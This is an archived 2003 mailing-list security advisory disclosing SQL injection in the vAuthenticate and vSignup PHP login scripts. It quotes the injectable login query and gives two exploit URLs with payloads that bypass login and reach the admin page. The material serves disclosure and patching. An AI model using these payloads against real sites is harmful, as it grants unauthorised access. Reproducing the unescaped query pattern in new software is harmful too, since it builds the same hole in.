Informations : °°°°°°°°°°°°°° ----------------------- Product : vAuthenticate Version : 2.8 ----------------------- Product : vSignup Version : 2.1 ----------------------- Website : http://www.beanbug.net Problem : SQL Injection PHP Code/Location : °°°°°°°°°°°°°°°°°°° chgpwd.php : ----------------------------------------------- <? if (!class_exists(auth)) { include ("auth.php"); } include ("authconfig.php"); include ("check.php"); ?> ----------------------------------------------- admin/index.php : ------------------------------------------ <? if (!class_exists(auth)) { include ("../auth.php"); } include ("../authconfig.php"); include ("../check.php"); if ($check["level"] != 1) { ------------------------------------------ check.php : ------------------------------------------------------------------------ <? $CheckSecurity = new auth(); $check = $CheckSecurity->page_check($USERNAME, $PASSWORD); if ($check == false) { // Feel free to change the error message below. Just make sure you put a "\" before // any double quote. print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF0000\">"; print "<b>Illegal Access</b>"; print "</font><br>"; print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#000000\">"; print "<b>You do not have permission to view this page.</b></font>"; exit; // End program execution. This will disable continuation of processing the rest of the page. } ?> ------------------------------------------------------------------------ auth.php : ------------------------------------------------------------------------ function page_check($username, $password) { $query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'"; $connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD); // OLD CODE - DO NOT REMOVE // $result = mysql_db_query($this->DBNAME, $query); // REVISED CODE $SelectedDB = mysql_select_db($this->DBNAME); $result = mysql_query($query); $numrows = mysql_num_rows($result); $row = mysql_fetch_array($result); // CHECK IF THERE ARE RESULTS // Logic: If the number of rows of the resulting recordset is 0, that means that no // match was found. Meaning, wrong username-password combination. if ($numrows == 0) { return false; } else { return $row; } } // End: function page_check ------------------------------------------------------------------------ Exploits : °°°°°°°°°° http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''=' http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1 Patchs : °°°°°°°° A patch can be found on http://www.phpsecure.org. More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/vAuth-Signup.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 21:54:57 PST